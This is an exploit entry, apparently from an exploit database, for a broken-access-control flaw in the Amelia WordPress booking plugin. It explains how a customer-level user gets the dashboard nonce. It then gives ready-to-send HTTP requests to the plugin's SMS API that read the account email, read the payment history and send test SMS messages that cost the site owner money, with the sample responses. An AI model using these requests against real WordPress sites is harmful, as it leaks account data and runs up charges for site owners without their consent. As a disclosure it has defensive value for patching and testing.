## https://sploitus.com/exploit?id=WPEX-ID:0882E5C0-F319-4994-9346-AA18438FDA6A
To get the ameliaNonce, view the source code of the Amelia dashboard when logged in as a customer and look for "wpAmeliaNonce"
## Get User Info
POST /wp-admin/admin-ajax.php?action=wpamelia_api&call=/notifications/sms&ameliaNonce=785ba17145 HTTP/1.1
Accept: */*
Accept-Language: en-GB,en;q=0.5
Accept-Encoding: gzip, deflate
X-Requested-With: XMLHttpRequest
Connection: close
Cookie: [customer+]
Content-Type: application/json;charset=utf-8
Content-Length: 24
{"action":"getUserInfo"}
Response:
{"message":"Amelia SMS API request successful","data":{"status":"OK","user":{"email":"redacted@gmail.com","balance":0}}}
## Get Payment History
POST /wp-admin/admin-ajax.php?action=wpamelia_api&call=/notifications/sms&ameliaNonce=785ba17145 HTTP/1.1
Accept: */*
Accept-Language: en-GB,en;q=0.5
Accept-Encoding: gzip, deflate
X-Requested-With: XMLHttpRequest
Connection: close
Cookie: [customer+]
Content-Type: application/json;charset=utf-8
Content-Length: 30
{"action":"getPaymentHistory"}
Response:
{"message":"Amelia SMS API request successful","data":{"status":"OK","payments":[],"countFiltered":0}}
## Send test notification (cost real money)
POST /wp-admin/admin-ajax.php?action=wpamelia_api&call=/notifications/sms&ameliaNonce=785ba17145 HTTP/1.1
Accept: */*
Accept-Language: en-GB,en;q=0.5
Accept-Encoding: gzip, deflate
X-Requested-With: XMLHttpRequest
Connection: close
Cookie: [customer+]
Content-Type: application/json;charset=utf-8
Content-Length: 146
{
"action":"testNotification",
"data":{
"type": "appointment",
"notificationTemplate": 1,
"recipientPhone":"11111111"
}
}